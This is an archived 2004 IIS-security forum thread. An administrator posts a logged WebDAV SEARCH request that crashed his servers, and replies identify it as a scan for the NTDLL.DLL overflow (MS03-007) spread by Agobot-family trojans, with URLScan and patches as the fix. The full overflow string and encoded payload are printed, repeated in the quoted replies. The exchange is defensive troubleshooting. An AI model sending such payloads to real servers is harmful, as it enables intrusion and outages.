all groups > iis security > april 2004 >
You're in the

iis security

group:

New Security hole?


New Security hole? Kfir
4/28/2004 2:59:02 AM
iis security:
I may found a new security hole in IIS. Some of my=20
websites stopped responding on http, I checked the logs=20
and found this:

SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA???=18??????????????????????????????????
####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlim
ddddddrfsmlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpid
jndjjndfididjlddddddhdigssejlgslsskhfmlosljnddlopjlgpdelid
loilspiglgpddhidikssijdhidikssijdlillipdkhdmloqpggpdidigss
ijdpssijedieijlohigploihflkldgqiiflokffddgsiggpmhmhenqdgpi
ggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinloinfhdgqqjjlo
dpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskmdnrl
somksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddh
ddddddssssddddolddddddddddddddhddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddrldddddddreson
drddohdmpqfeoldehppqfeihjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjs
khfdjfjifdkfkijrfdjmjrfdhhhsigfdjqjsjhjifrdqdqdnfhdddddddd
ddddddnigldipkreimjomhreimjomhreimjomhmnhijkmhrgimjomhjfhi
jimhrgimjomhlrhjjemhrnimjomhlrhjjsmhrgimjomhreimjnmhljimjo
mhjfiegjmhrlimjomhrkknjdmhrdimjomhifjmjgjlreimjomhdddddddd
ddddddddddddddddddddddddddddddddddddddddidhiddddhpdedgddiq
rlegjeddddddddddddddddrddddsdedodekmqkddgdddddddedddddddmd
ddddndpnddddddndddddddqdddddddddhdddddeddddddddfdddddhdddd
dddddddddddhddddddddddddddddrddddddddhdddddddddddddgdddddd
ddddedddddedddddddddedddddedddddddddddddeddddddddddddddddd
ddddddddqdddddgldedddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddmdddddddeddddddddddddddddh
ddddddddddddddddddddddddddddldddddrdddddddddddddddddddgddd
ddddndddddddfpdddddddhddddddddddddddddddddddddddddhdddddrd
ddddddddddddddddddedddddddqddddddddfddddddgddddddddddddddd
ddddddddddddddhdddddpddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddsssseirlhdhdddrldddddqoplipdkigi
jldhdednjlkhngefidojsfppjpemrpedgpklfmsdiooosqhsfnsplgsldf
kidirmdmdefpdhddhpsrqskrpmpgmdlerpdldfeflqhhfhddijiklogqgl
hehdsossompigpifrdjpqklgphdplqhpfhdljnddiejhkkjgosqqigrdhd
dirhhdkdgpfrlogihdsjkkkskgdifkdhssqjmmomdiirsksmloehmiklir
egqsmrhpqlifeejhfidkdsldkmdihlonookksslgplslhdlodhlioqgqme
pkliirdkffkpmrehpqhhfmdpiokihkrhlegrkjsepnidopsflpskgoieeo
qoqosssssseirlhdhdddrldddddqoplipdkigijldhdednjlkhngefidoj
sfppjpemrpedgpklfmsdiooosqhsfnsplgsldfkidirmdmdefpdhddhpsr
qskrpmpgmdlerpdldfeflqhhfhddijiklogqglhehdsossompigpifrdjp
qklgphdplqhpfhdljnddiejhkkjgosqqigrdhddirhhdkdgpfrlogihdsj
kkkskgdifkdhssqjmmomdiirsksmloehmikliregqsmrhpqlifeejhfidk
dsldkmdihlonookksslgplslhdlodhlihheilqlpfhehohidjlqlkgiesg
kfhlikfhdesrehligpqmrqkhokneepiffmfhlpqpjlqnjdrskkqodpklfh
dkdeopisirlephpmqokksgsqjsddlgrpedjlsljpogqpggpdpkrmkknsqo
grgplmdkdldgdpsmegdhkdeeoooikkjgqeglfhskqleopddgkpphedhplf
rmqrojjlpdefddjrheghkhkgmosssjngshnikokhghjndejnddjndffmip
dldnofoeiljhdhlodsdgenkfreiorhdehsgdpfdlddjsnddejrjrfogped
igiikesgdfogimmlhesskqrkkrdslijpdqfpedrpnesdnieekhempkdiql
sromprkikoileknieddjesdjrproekoofkfkpseljhdddedlgpdhdplphp
jkhldlndmnehdskskkskesnllqdpldlofqpheqloeqpldilqdhhllqehld
neklpkliqslhlfjqlmihjgkpgnfpksginegldroksorjdhdmsskhfoidgp
egsphhjrmiesgoonerokehdsepidedldffqmlqnqsoqsssqgnldgjqqidn
pphdeflipqlqoeejqjhsqdhdhlkdheeoioodrjnghpkmqklgjkehekdhkg
mssqjqikiffkjlndfjghjjngqhqehqrlkrmqsodslhjgqdienegjjnsspm
qhrmkjdqpspoelipoheldlereprrfedgejkoskeffpdhfhkpjlmdjekqeq
eoqrpqlsilmrfqklngkdmggrdijlqdssqnqjdpililieqgmqlolosdlerj
sspgqldpleddqknolgsndgkkeqssfhmijeslqsqpipeheqnmedperfeddg
sfrodolojikqmdjsooeiperddpsdfoeodldslkmi - 404 -

This is some kind of URL Request that after getting it a=20
few times IIS will stop responding on HTTP.

It came from different IP addresses in the world and=20
seems to be from machines with Windows98 (Trojan horse=20
maybe?)

I fixed it with installing URLSCAN tool on IIS which=20
automatically rejects these requests.

If anyone has information about it or has seen it too=20
please reply here.

Regards,

Kfir cohen -MCSE
Systems Manager.


Re: New Security hole? Kfir
4/28/2004 4:19:12 AM
Yes I have but I can see on the logs after I installed=20
the URLSCAN that now it rejects these URL requests.

By the way all the requests come from win98 machines with=20
IE5.5, probably it's a new torjan horse that tries to get=20
into machines on port 80

Kfir

[quoted text, click to view]
Re: New Security hole? Karl Levinson [x y] mvp
4/28/2004 7:12:56 AM
It looks like a scan for the old NTDLL.DLL vulnerability via WebDAV that was
fixed by the MS03-007 patch. The resurgence of these scans now is probably
due to the Agobot / Gaobot / Polybot / Phatbot family of trojans.

URLScan and IIS Lockdown is a good bet, I would have wanted it on there
right from the start of the server's life. I wouldn't recommend running an
IIS 5 or older server without it.


[quoted text, click to view]
I may found a new security hole in IIS. Some of my
websites stopped responding on http, I checked the logs
and found this:

SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA?????????????????????????????????????
####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlim
ddddddrfsmlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpid
jndjjndfididjlddddddhdigssejlgslsskhfmlosljnddlopjlgpdelid
loilspiglgpddhidikssijdhidikssijdlillipdkhdmloqpggpdidigss
ijdpssijedieijlohigploihflkldgqiiflokffddgsiggpmhmhenqdgpi
ggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinloinfhdgqqjjlo
dpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskmdnrl
somksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddh
ddddddssssddddolddddddddddddddhddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddrldddddddreson
drddohdmpqfeoldehppqfeihjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjs
khfdjfjifdkfkijrfdjmjrfdhhhsigfdjqjsjhjifrdqdqdnfhdddddddd
ddddddnigldipkreimjomhreimjomhreimjomhmnhijkmhrgimjomhjfhi
jimhrgimjomhlrhjjemhrnimjomhlrhjjsmhrgimjomhreimjnmhljimjo
mhjfiegjmhrlimjomhrkknjdmhrdimjomhifjmjgjlreimjomhdddddddd
ddddddddddddddddddddddddddddddddddddddddidhiddddhpdedgddiq
rlegjeddddddddddddddddrddddsdedodekmqkddgdddddddedddddddmd
ddddndpnddddddndddddddqdddddddddhdddddeddddddddfdddddhdddd
dddddddddddhddddddddddddddddrddddddddhdddddddddddddgdddddd
ddddedddddedddddddddedddddedddddddddddddeddddddddddddddddd
ddddddddqdddddgldedddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddmdddddddeddddddddddddddddh
ddddddddddddddddddddddddddddldddddrdddddddddddddddddddgddd
ddddndddddddfpdddddddhddddddddddddddddddddddddddddhdddddrd
ddddddddddddddddddedddddddqddddddddfddddddgddddddddddddddd
ddddddddddddddhdddddpddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddsssseirlhdhdddrldddddqoplipdkigi
jldhdednjlkhngefidojsfppjpemrpedgpklfmsdiooosqhsfnsplgsldf
kidirmdmdefpdhddhpsrqskrpmpgmdlerpdldfeflqhhfhddijiklogqgl
hehdsossompigpifrdjpqklgphdplqhpfhdljnddiejhkkjgosqqigrdhd
dirhhdkdgpfrlogihdsjkkkskgdifkdhssqjmmomdiirsksmloehmiklir
egqsmrhpqlifeejhfidkdsldkmdihlonookksslgplslhdlodhlioqgqme
pkliirdkffkpmrehpqhhfmdpiokihkrhlegrkjsepnidopsflpskgoieeo
qoqosssssseirlhdhdddrldddddqoplipdkigijldhdednjlkhngefidoj
sfppjpemrpedgpklfmsdiooosqhsfnsplgsldfkidirmdmdefpdhddhpsr
qskrpmpgmdlerpdldfeflqhhfhddijiklogqglhehdsossompigpifrdjp
qklgphdplqhpfhdljnddiejhkkjgosqqigrdhddirhhdkdgpfrlogihdsj
kkkskgdifkdhssqjmmomdiirsksmloehmikliregqsmrhpqlifeejhfidk
dsldkmdihlonookksslgplslhdlodhlihheilqlpfhehohidjlqlkgiesg
kfhlikfhdesrehligpqmrqkhokneepiffmfhlpqpjlqnjdrskkqodpklfh
dkdeopisirlephpmqokksgsqjsddlgrpedjlsljpogqpggpdpkrmkknsqo
grgplmdkdldgdpsmegdhkdeeoooikkjgqeglfhskqleopddgkpphedhplf
rmqrojjlpdefddjrheghkhkgmosssjngshnikokhghjndejnddjndffmip
dldnofoeiljhdhlodsdgenkfreiorhdehsgdpfdlddjsnddejrjrfogped
igiikesgdfogimmlhesskqrkkrdslijpdqfpedrpnesdnieekhempkdiql
sromprkikoileknieddjesdjrproekoofkfkpseljhdddedlgpdhdplphp
jkhldlndmnehdskskkskesnllqdpldlofqpheqloeqpldilqdhhllqehld
neklpkliqslhlfjqlmihjgkpgnfpksginegldroksorjdhdmsskhfoidgp
egsphhjrmiesgoonerokehdsepidedldffqmlqnqsoqsssqgnldgjqqidn
pphdeflipqlqoeejqjhsqdhdhlkdheeoioodrjnghpkmqklgjkehekdhkg
mssqjqikiffkjlndfjghjjngqhqehqrlkrmqsodslhjgqdienegjjnsspm
qhrmkjdqpspoelipoheldlereprrfedgejkoskeffpdhfhkpjlmdjekqeq
eoqrpqlsilmrfqklngkdmggrdijlqdssqnqjdpililieqgmqlolosdlerj
sspgqldpleddqknolgsndgkkeqssfhmijeslqsqpipeheqnmedperfeddg
sfrodolojikqmdjsooeiperddpsdfoeodldslkmi - 404 -

This is some kind of URL Request that after getting it a
few times IIS will stop responding on HTTP.

It came from different IP addresses in the world and
seems to be from machines with Windows98 (Trojan horse
maybe?)

I fixed it with installing URLSCAN tool on IIS which
automatically rejects these requests.

If anyone has information about it or has seen it too
please reply here.

Regards,

Kfir cohen -MCSE
Systems Manager.



Re: New Security hole? Ken Schaefer
4/28/2004 8:54:21 PM
Do you have MS04-011 installed on this machine?
http://www.microsoft.com/technet/security/Bulletin/MS04-011.mspx

Cheers
Ken

[quoted text, click to view]
I may found a new security hole in IIS. Some of my
websites stopped responding on http, I checked the logs
and found this:

SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA?????????????????????????????????????
####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlim
ddddddrfsmlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpid
jndjjndfididjlddddddhdigssejlgslsskhfmlosljnddlopjlgpdelid
loilspiglgpddhidikssijdhidikssijdlillipdkhdmloqpggpdidigss
ijdpssijedieijlohigploihflkldgqiiflokffddgsiggpmhmhenqdgpi
ggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinloinfhdgqqjjlo
dpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskmdnrl
somksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddh
ddddddssssddddolddddddddddddddhddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddddddddddddddrldddddddreson
drddohdmpqfeoldehppqfeihjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjs
khfdjfjifdkfkijrfdjmjrfdhhhsigfdjqjsjhjifrdqdqdnfhdddddddd
ddddddnigldipkreimjomhreimjomhreimjomhmnhijkmhrgimjomhjfhi
jimhrgimjomhlrhjjemhrnimjomhlrhjjsmhrgimjomhreimjnmhljimjo
mhjfiegjmhrlimjomhrkknjdmhrdimjomhifjmjgjlreimjomhdddddddd
ddddddddddddddddddddddddddddddddddddddddidhiddddhpdedgddiq
rlegjeddddddddddddddddrddddsdedodekmqkddgdddddddedddddddmd
ddddndpnddddddndddddddqdddddddddhdddddeddddddddfdddddhdddd
dddddddddddhddddddddddddddddrddddddddhdddddddddddddgdddddd
ddddedddddedddddddddedddddedddddddddddddeddddddddddddddddd
ddddddddqdddddgldedddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddddmdddddddeddddddddddddddddh
ddddddddddddddddddddddddddddldddddrdddddddddddddddddddgddd
ddddndddddddfpdddddddhddddddddddddddddddddddddddddhdddddrd
ddddddddddddddddddedddddddqddddddddfddddddgddddddddddddddd
ddddddddddddddhdddddpddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddsssseirlhdhdddrldddddqoplipdkigi
jldhdednjlkhngefidojsfppjpemrpedgpklfmsdiooosqhsfnsplgsldf
kidirmdmdefpdhddhpsrqskrpmpgmdlerpdldfeflqhhfhddijiklogqgl
hehdsossompigpifrdjpqklgphdplqhpfhdljnddiejhkkjgosqqigrdhd
dirhhdkdgpfrlogihdsjkkkskgdifkdhssqjmmomdiirsksmloehmiklir
egqsmrhpqlifeejhfidkdsldkmdihlonookksslgplslhdlodhlioqgqme
pkliirdkffkpmrehpqhhfmdpiokihkrhlegrkjsepnidopsflpskgoieeo
qoqosssssseirlhdhdddrldddddqoplipdkigijldhdednjlkhngefidoj
sfppjpemrpedgpklfmsdiooosqhsfnsplgsldfkidirmdmdefpdhddhpsr
qskrpmpgmdlerpdldfeflqhhfhddijiklogqglhehdsossompigpifrdjp
qklgphdplqhpfhdljnddiejhkkjgosqqigrdhddirhhdkdgpfrlogihdsj
kkkskgdifkdhssqjmmomdiirsksmloehmikliregqsmrhpqlifeejhfidk
dsldkmdihlonookksslgplslhdlodhlihheilqlpfhehohidjlqlkgiesg
kfhlikfhdesrehligpqmrqkhokneepiffmfhlpqpjlqnjdrskkqodpklfh
dkdeopisirlephpmqokksgsqjsddlgrpedjlsljpogqpggpdpkrmkknsqo
grgplmdkdldgdpsmegdhkdeeoooikkjgqeglfhskqleopddgkpphedhplf
rmqrojjlpdefddjrheghkhkgmosssjngshnikokhghjndejnddjndffmip
dldnofoeiljhdhlodsdgenkfreiorhdehsgdpfdlddjsnddejrjrfogped
igiikesgdfogimmlhesskqrkkrdslijpdqfpedrpnesdnieekhempkdiql
sromprkikoileknieddjesdjrproekoofkfkpseljhdddedlgpdhdplphp
jkhldlndmnehdskskkskesnllqdpldlofqpheqloeqpldilqdhhllqehld
neklpkliqslhlfjqlmihjgkpgnfpksginegldroksorjdhdmsskhfoidgp
egsphhjrmiesgoonerokehdsepidedldffqmlqnqsoqsssqgnldgjqqidn
pphdeflipqlqoeejqjhsqdhdhlkdheeoioodrjnghpkmqklgjkehekdhkg
mssqjqikiffkjlndfjghjjngqhqehqrlkrmqsodslhjgqdienegjjnsspm
qhrmkjdqpspoelipoheldlereprrfedgejkoskeffpdhfhkpjlmdjekqeq
eoqrpqlsilmrfqklngkdmggrdijlqdssqnqjdpililieqgmqlolosdlerj
sspgqldpleddqknolgsndgkkeqssfhmijeslqsqpipeheqnmedperfeddg
sfrodolojikqmdjsooeiperddpsdfoeodldslkmi - 404 -

This is some kind of URL Request that after getting it a
few times IIS will stop responding on HTTP.

It came from different IP addresses in the world and
seems to be from machines with Windows98 (Trojan horse
maybe?)

I fixed it with installing URLSCAN tool on IIS which
automatically rejects these requests.

If anyone has information about it or has seen it too
please reply here.

Regards,

Kfir cohen -MCSE
Systems Manager.



AddThis Social Bookmark Button